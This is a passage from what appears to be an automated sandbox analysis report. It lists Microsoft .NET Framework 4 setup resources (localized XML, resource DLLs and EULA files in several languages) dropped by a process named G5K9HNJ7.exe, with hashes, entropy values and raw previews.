                                                            Entropy (8bit):5.329033876405121
                                                            Encrypted:false
                                                            SSDEEP:96:rTBfv+/9TfHTGDXtZEOuAs50Y1EIF19VWMpDHvuKMLDBD+d54+QFEp5Tf+8K+l1S:5ffduAs591EIb9gOpqDoDZQmx2W2
                                                            MD5:E2F73097FC60F5347BAD1C1E93B2941B
                                                            SHA1:8564447AF45B488AC713D898405B759365662598
                                                            SHA-256:72860227092C38AE5E00E24C75E9B263E77BD2032EE597AABE408B9176448097
                                                            SHA-512:94ECD5BD5053A417BFF3E49C5E7B362843D2C850DA09D389161D4F4D98DE624473E0F143E6A088AB288AB4DA49B7910FFC80F77401009F560B60470FB13609B1
                                                            Malicious:false
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1053\deflangfe1053{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\sb120\sa120\lang1033\b\f0\fs28 TILL\'c4GGSLICENSVILLKOR F\'d6R PROGRAMVARA FR\'c5N MICROSOFT\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\sb120\sa120\fs22 MICROSOFT .NET FRAMEWORK 4 F\'d6R OPERATIVSYSTEMET MICROSOFT WINDOWS\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE F\'d6R OPERATIVSYSTEMET MICROSOFT WINDOWS\par..OCH ASSOCIERADE SPR\'c5KPAKET\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\lang1053\b0\f0\fs20 Microsoft Corporation (eller beroende p\'e5 var du bor, ett av dess koncernbolag) licensierar detta till\'e4gg till dig.\lang1033\b \lang1053\b0 Om du innehar licens f\'f6r programvara f\'f6r operativsystemet Microsoft Windows (som detta till\'e4gg g\'e4ller f\'f6r) (\rdblquote pr

                                                            C:\6c8944922f7b98d0b6cd82b768\1055\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (658), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):76818
                                                            Entropy (8bit):3.7161950547055933
                                                            Encrypted:false
                                                            SSDEEP:1536:bM8DL5YHRL87mlQg5IgrbGZzwOS8Frc+iI0jJNJ7rtRpUR:bM8DL5YHRL87mlQg5IgrbGZzwOS8FrcS
                                                            MD5:65E771FED28B924942A10452BBBF5C42
                                                            SHA1:586921B92D5FB297F35EFFC2216342DAC1AE2355
                                                            SHA-256:45E30569A756D9BCBC5F9DAE78BDA02751FD25E1C0AEE471CE112CB4464A6EE2
                                                            SHA-512:D014A2A96F3A5C487EF1CADDD69599DBEC15DA5AD689D68009F1CA4D5CB694105A7903F508476D6FFEC9D81386CB184DF6FC428D34F056190CEE30715514A8F7
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".K.u.r.u.l.u.m. .u.y.u.m.l.u.l.u.k. .m.o.d.u.n.d.a. ...a.l.1._.a.m.a.z... .D.a.h.a. .f.a.z.l.a. .b.i.l.g.i. .i...i.n. .b.k.z... .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.B.e.n.i.o.k.u. .d.o.s.y.a.s.1.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.

                                                            C:\6c8944922f7b98d0b6cd82b768\1055\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):17752
                                                            Entropy (8bit):5.263298426482242
                                                            Encrypted:false
                                                            SSDEEP:384:Hfp2mDyEkEIb7/dscoGvXdBXbtRS0W0eW0LXci2jpvhPN:H1DyEkEIFscVXdBXbtRVsMi2jpvhl
                                                            MD5:357A1CBF08A83E657FFAE8639AC1212A
                                                            SHA1:384DF3D9DBBE27731785D92C257B7BA584FBE5E8
                                                            SHA-256:DD7337A6C67B39905A9B01C4212667F27EDFB68E86D1099E20EC37B03C51E7B9
                                                            SHA-512:67E47DF1E462A279C909B7B4255BEC4824554890CFF789BDF6691898A66E71DB007794476508F9290D95ACCE908109AA589A3A01A04125AEBB9EFBF67AEBF25F
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........*...............................................P............@.......................................... ...'..............X............................................................................................text...G...........................@..@.rsrc....0... ...(..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\1055\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1254, default language ID 1055
                                                            Category:dropped
                                                            Size (bytes):3859
                                                            Entropy (8bit):5.120677849638168
                                                            Encrypted:false
                                                            SSDEEP:96:VSfjQOTqfRRTqfSD+vmScfQEz04jMpDLiIzhZLlZhD2:wfcFpcfEo4jOT2
                                                            MD5:D71A0D5B6CB13901CD35C036D395BE59
                                                            SHA1:B0F83CF648C2E84119A32AFD2E0EF409BB2047CE
                                                            SHA-256:A8850F6DBF56B6C55D255E81B15A3D17196EEE89FFBE41CDFCA19205628C1A7B
                                                            SHA-512:FE7C6E54014AD963F51850973F5AE5872FBA9843F1C20973F5E875008064F870A5217C2C9ADA3D92A3F1B2DF6318D5137814943D6295E72CF27343DF93B957E1
                                                            Malicious:false
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg1254\deff0\deflang1055\deflangfe1055{\fonttbl{\f0\fswiss\fprq2\fcharset162 Tahoma;}{\f1\froman\fprq2\fcharset162{\*\fname Times New Roman;}Times New Roman TUR;}{\f2\fswiss\fprq2\fcharset162 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs20 MICROSOFT YAZILIM EK\'dd L\'ddSANS KO\'deULLARI\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\lang1055\f0 MICROSOFT WINDOWS \'dd\'deLET\'ddM S\'ddSTEMLER\'dd \'dd\'c7\'ddN MICROSOFT .NET FRAMEWORK 4\lang1033\f1\par..\lang1055\f0 MICROSOFT WINDOWS \'dd\'deLET\'ddM S\'ddSTEMLER\'dd \'dd\'c7\'ddN MICROSOFT .NET FRAMEWORK 4 \'ddSTEMC\'dd PROF\'ddL\'dd\par..VE \'ddL\'dd\'deK\'ddL\'dd D\'ddL PAKETLER\'dd\lang1033\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\lang1055\b0\f0 Microsoft Corporation (veya ya\'fead\'fd\'f0\'fdn\'fdz yere g\'f6re bir ba\'f0l\'fd \'feirketi) bu ekin lisans\'fdn\'fd size v

                                                            C:\6c8944922f7b98d0b6cd82b768\2052\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (452), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):60684
                                                            Entropy (8bit):4.338517891382778
                                                            Encrypted:false
                                                            SSDEEP:384:4w7yHdhTgqbbT1HjWZez2jtKgst+7x0x8EM5NnqQivGXU4woZukC7FQKAuXR/4mn:dyjg2z2bXXwoZukC7FQKAuXRgcJf
                                                            MD5:10DA125EEABCBB45E0A272688B0E2151
                                                            SHA1:6C4124EC8CA2D03B5187BA567C922B6C3E5EFC93
                                                            SHA-256:1842F22C6FD4CAF6AD217E331B74C6240B19991A82A1A030A6E57B1B8E9FD1EC
                                                            SHA-512:D968ABD74206A280F74BF6947757CCA8DD9091B343203E5C2269AF2E008D3BB0A17FF600EB961DBF69A93DE4960133ADE8D606FB9A99402D33B8889F2D0DA710
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..[..z.^.e.l.N|Q.['`!j._.L..0.gsQ..~.Oo`.....S..&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.....e.N&.l.t.;./.A.&.g.t.;..0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".xS}. .M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. ..S...O.[..g.N.^(u.z.^.e.lck8^.L.

                                                            C:\6c8944922f7b98d0b6cd82b768\2052\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):14168
                                                            Entropy (8bit):6.010838262457833
                                                            Encrypted:false
                                                            SSDEEP:192:rsLnUfwVWtTXjuQShyjK7tWUEW5IQKPnEtObMacxc8hjeyveCXMOV:4eCTFhMKZWUEW5ILXci2jpvP
                                                            MD5:407CDB7E1C2C862B486CDE45F863AE6E
                                                            SHA1:308AEEBEB1E1663ACA26CE880191F936D0E4E683
                                                            SHA-256:9DD9D76B4EF71188B09F3D074CD98B2DE6EA741530E4EA19D539AE3F870E8326
                                                            SHA-512:7B4F43FC24EB30C234F2713C493B3C13928C591C77A3017E8DD806A41CCFEDD53B0F748B5072052F8F9AC43236E8320B19D708903E3F06C59C6ED3C12722494E
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................@.......y....@.......................................... ............... ..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\2052\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):5827
                                                            Entropy (8bit):4.418112026919231
                                                            Encrypted:false
                                                            SSDEEP:96:M5DBmf0jLTCLLgLTCLLmDjxrDT2k9rkKp7aDKaXzaWZMa/O9wzy6n/MpDTKTGptk:EmfJXoQkRGDtXeWZv/O9XmOdZzQJWBBi
                                                            MD5:4288C2541843F75C348D825FC8B94153
                                                            SHA1:E0DD8ED7BDB3C941A589361EE764F49A3619C264
                                                            SHA-256:C30A7597AA67E2847940E2C24F09B35C07B1EC759ADBCA7C8261141FC1ECCA92
                                                            SHA-512:7BA9991FE4EED625FE7BEF96A1D3AE70CB7616AAD034236D1A2B346A08B48280CB6C20D2B059DA9953919B0265125FE56DC5F4CC619AC653B4C1164ED564B359
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars $(.<?[\'7b\'a3\'a5\'ab\'b7\'91\'93}{\*\fchars !"%'),.:\'3b>?]`|\'7d~\'a2\'a8\'af\'b0\'b7\'bb\'92\'94\'85\'89\'9b}}..\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs20 MICROSOFT \lang2052\f1\'c8\'ed\'bc\'fe\'b2\'b9\'b3\'e4\'b3\'cc\'d0\'f2\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang2052\f1\'d3\'c3\'d3\'da\lang1033\f0 MICROSOFT WINDOWS \lang2052\f1\'b2\'d9\'d7\'f7\'cf\'b5\'cd\'b3\'b5\'c4\lang1033\f0 MICROSOFT .NET FRAMEWORK 4\f2\par..\lang2052\f1\'d3\'c3\'d3\'da\lang1033\f0 MICROSOFT WINDOWS \lang2052\f1\'b2\'d9\'d7\'f7\'cf\'b5\'cd\'b3\'b5\'c4\lang1033\f0 MICROSOFT .NET FRAMEWORK 4 CLI

                                                            C:\6c8944922f7b98d0b6cd82b768\2070\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (665), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):80254
                                                            Entropy (8bit):3.5905984831890927
                                                            Encrypted:false
                                                            SSDEEP:384:4wdLPpRgMjLeUueUA48DYeUOqeUd/iboeuXWpFPYOAjw/BdgysR0AmhRod30J0qf:fenekeCeRuXWpFxgJMh230JMaWs
                                                            MD5:7FA9926A4BC678E32E5D676C39F8FB97
                                                            SHA1:BBA4311DD30261A9B625046F8A6EA215516C9213
                                                            SHA-256:A25EE75C78C24C50440AD7DE9929C6A6E1CC0629009DC0D01B90CBAC177DD404
                                                            SHA-512:E06423BC1EA50A566D341DC513828608E9B6611FEA81D33FCA471A38F6B2B61B556EA07A5DEC0830F3E87194975D87F267A5E5E1A2BE5E6A86B07C5BB2BDDCB6
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".O. .p.r.o.g.r.a.m.a. .d.e. .c.o.n.f.i.g.u.r.a.....o. .n...o. .p.o.d.e. .s.e.r. .e.x.e.c.u.t.a.d.o. .n.o. .m.o.d.o. .d.e. .c.o.m.p.a.t.i.b.i.l.i.d.a.d.e... .P.a.r.a. .m.a.i.s. .i.n.f.o.r.m.a.....e.s.,. .c.o.n.s.u.l.t.e. .o. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.F.i.c.h.e.i.r.o. .L.e.i.a.-.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.

                                                            C:\6c8944922f7b98d0b6cd82b768\2070\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18776
                                                            Entropy (8bit):5.195239987750812
                                                            Encrypted:false
                                                            SSDEEP:192:8ae5UfwxWr4KyGpTOSZmzmTssa8x91cvWp7eWYQKPnEtObMacxc8hjeyveCXgs:V32NAT7ZmzmYpqUvWp7eWYLXci2jpvas
                                                            MD5:58CB55FA4D9E2F62F675720B1269137D
                                                            SHA1:472F8E4982369C703C78091E66E33BF6B2A03F09
                                                            SHA-256:9C9E0ABFDB8065ECEC3420398DA687FAD4429F4CBF68B7082C8221925BF8D86B
                                                            SHA-512:123906A064033F37891DBB9C2A01A990AFD3C8447E38CDF66265784449FDD94806372A589A7DEA074830EB1DF7812E4877A1EE59171D37F1652167A03D2B961B
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................P......U^....@.......................................... .. *...........2..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\2070\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 2070
                                                            Category:dropped
                                                            Size (bytes):4015
                                                            Entropy (8bit):5.250694812846901
                                                            Encrypted:false
                                                            SSDEEP:96:r4IffB09DkTLGTHD28ygHx0LlHKe1rvGA9mE0Eyh+iH/OMpiKwIurpEpiT0T8x8w:VfB8ygHclqe1ruAYEBm+imOvurerV2
                                                            MD5:4518BE9A9BCA5BE1D8AC926A4B2C087D
                                                            SHA1:D089427D93EA726380E89ECF00127BD51A4DCFC1
                                                            SHA-256:D838ACF5ED559C58F623F73AF4902A13848502778EEA7AF585AC2E801D7C8C45
                                                            SHA-512:7BCF5248E36D98D74040B6AFB08CA62A3255E397A26FF6DCA9A8E42BADF71BC0005FD8FE8B3CA3A4896434823A9E3401EEC86EF60B1A6CE395CE21A710626478
                                                            Malicious:false
                                                            Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang2070\deflangfe1041{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue0;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs28 TERMOS DE LICENCIAMENTO SUPLEMENTARES PARA SOFTWARE MICROSOFT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\lang2070\f0\fs22 MICROSOFT .NET FRAMEWORK 4 PARA O SISTEMA OPERATIVO MICROSOFT WINDOWS\lang1033\f1\par..\lang2070\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE PARA O SISTEMA OPERATIVO MICROSOFT WINDOWS\par..E PACOTES DE IDIOMAS ASSOCIADOS\lang1033\f1\fs20\par..\pard\ltrpar\nowidctlpar\sb120\sa120\lang2070\b0\f0 A Microsoft Corporation (ou, dependendo do pa\'eds em que reside, uma das respectivas empresas afiliadas) licencia este suplemento para o Adquirente.\lang1033\b \lang2070\b0 Se o Adquirente es

                                                            C:\6c8944922f7b98d0b6cd82b768\3076\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (457), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):60816
                                                            Entropy (8bit):4.3418522371704045
                                                            Encrypted:false
                                                            SSDEEP:384:4wCGbCWB6rFk+2jP8lxtrzh1hsPN7ODPnPgQy50sJCXnofDPiv:tbCWYFrewYTJCf
                                                            MD5:967A6D769D849C5ED66D6F46B0B9C5A4
                                                            SHA1:C0FF5F094928B2FA8B61E97639C42782E95CC74F
                                                            SHA-256:0BC010947BFF6EC1CE9899623CCFDFFD702EEE6D2976F28D9E06CC98A79CF542
                                                            SHA-512:219B13F1BEEB7D690AF9D9C7D98904494C878FBE9904F8CB7501B9BB4F48762F9D07C3440EFA0546600FF62636AC34CB4B32E270CF90CB47A9E08F9CB473030C
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..[..z._!q.l(W.v.['`!j._.N.WL..0.Y..s.0}.......S..&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;....b.jHh&.l.t.;./.A.&.g.t.;..0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..d..[. .M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. ..S...g.\..g.N.a(u.z._\PbkK.

                                                            C:\6c8944922f7b98d0b6cd82b768\3076\SetupResources.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):14168
                                                            Entropy (8bit):5.9724110685335825
                                                            Encrypted:false
                                                            SSDEEP:192:fc2+tUfwZWPl53LmlVlSW1g+/axw0lczWpXEWUQKPnEtObMacxc8hjeyveCXzHbk:hzuwLmlCW1g+/kmzWpXEWULXci2jpv3e
                                                            MD5:7C136B92983CEC25F85336056E45F3E8
                                                            SHA1:0BB527E7004601E920E2AAC467518126E5352618
                                                            SHA-256:F2E8CA58FA8D8E694D04E14404DEC4E8EA5F231D3F2E5C2F915BD7914849EB2B
                                                            SHA-512:06DA50DDB2C5F83E6E4B4313CBDAE14EED227EEC85F94024A185C2D7F535B6A68E79337557727B2B40A39739C66D526968AAEDBCFEF04DAB09DC0426CFBEFBF4
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........................................................@......E.....@.......................................... ..X............ ..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\3076\eula.rtf

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 950, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):6309
                                                            Entropy (8bit):4.470827969332999
                                                            Encrypted:false
                                                            SSDEEP:96:/R8NRf8TTVKTu4LuTu4LrzZD41raZM4HbegdxqKZJQ1/FSMZJujgzc/MpD1JzIf2:/R4Rfm2NBZMjOfro2n6CA2
                                                            MD5:6F2F198B6D2F11C0CBCE4541900BF75C
                                                            SHA1:75EC16813D55AAF41D4D6E3C8D4948E548996D96
                                                            SHA-256:D7D3CFBE65FE62DFA343827811A8071EC54F68D72695C82BEC9D9037D4B4D27A
                                                            SHA-512:B1F5B812182C7A8BF1C1A8D0F616B44B0896F2AC455AFEE56C44522B458A8638F5C18200A8FB23B56DC1471E5AB7C66BE1BE9B794E12EC06F44BEEA4D9D03D6F
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg950\deff0\deflang1033\deflangfe1028{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset136 \'b7\'73\'b2\'d3\'a9\'fa\'c5\'e9;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars (<?[`\'7b\'a2\'47\'a2\'44?\'a1\'a5\'a1\'a7}{\*\fchars !'),.:\'3b>?]|\'7d\'a2\'46\'a1\'50?\'a1\'56\'a1\'58\'a1\'a6\'a1\'a8\'a1\'45\'a1\'4b}}..\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs28 MICROSOFT \lang1028\f1\'b3\'6e\'c5\'e9\'bc\'57\'b8\'c9\'b1\'c2\'c5\'76\'b1\'f8\'b4\'da\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0\fs20 MICROSOFT WINDOWS \lang1028\f1\'a7\'40\'b7\'7e\'a8\'74\'b2\'ce\'aa\'ba\lang1033\f0 MICROSOFT .NET FRAMEWORK 4\f2\par..\f0 MICROSOFT WINDOWS \lang1028\f1\'a7\'40\'b7\'7e\'a8\'74\'b2\'ce\'aa\'ba\lang1033\f0 MICROSOFT .NET FRAMEWORK 4 \lang1028\f1\'a5\'ce\'a4\'e1\'ba\'dd\'b3\'5d\'a9

                                                            C:\6c8944922f7b98d0b6cd82b768\3082\LocalizedData.xml

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (656), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):79996
                                                            Entropy (8bit):3.5542515107748844
                                                            Encrypted:false
                                                            SSDEEP:1536:Xo/yYrDKRqvf+ffl0VMf/mfL94T+7j2JoiZq:Xo/yYrDKRqvf+feVMf/mfL94T+7j2Jrq
                                                            MD5:2D54FE70376DB0218E8970B28C1C4518
                                                            SHA1:83EE9AC93142751F23D5BB858F7264E27EA2EAB0
                                                            SHA-256:D17C5B638E2A4D43212D21A2052548C8D4909EB6410E30B8A951A292BCDBBEDD
                                                            SHA-512:20C0FB9A046911BC2D702AB321C3992262AC0F80F33DDDA5EC2CCAFE9EF07611774223369E0DC7CB91C9CDA1CBD65C598A7E1C914D6E6CA4B00205A16411BE30
                                                            Malicious:false
